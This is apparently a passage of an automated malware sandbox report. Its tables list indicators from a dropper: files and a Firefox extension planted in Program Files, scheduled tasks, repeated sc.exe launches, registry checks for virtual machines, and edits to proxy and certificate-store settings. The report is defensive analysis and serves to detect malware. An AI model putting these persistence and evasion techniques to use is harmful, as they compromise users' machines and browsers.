| File created | C:\Program Files (x86)\FgzgbZZAFicU2\tzpDtvt.xml | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File created | C:\Program Files (x86)\xWNndLwYWxPLC\ZveOxSt.dll | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File created | C:\Program Files (x86)\xWNndLwYWxPLC\JAwGJlf.xml | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File created | C:\Program Files (x86)\LYowOqXOU\SEZhTv.dll | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File created | C:\Program Files (x86)\LYowOqXOU\qwhXIaI.xml | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File created | C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR\EzmnMyU.dll | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\imJjYhUpaoZYZHtqO.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\PrqbyCvyRaPTCyA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\ovLFxavpEMJUeWygf.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\Dctooux.job | C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe | N/A |
| File created | C:\Windows\Tasks\bnTqljwkAIckBwCXiX.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1346.exe |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "7" | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
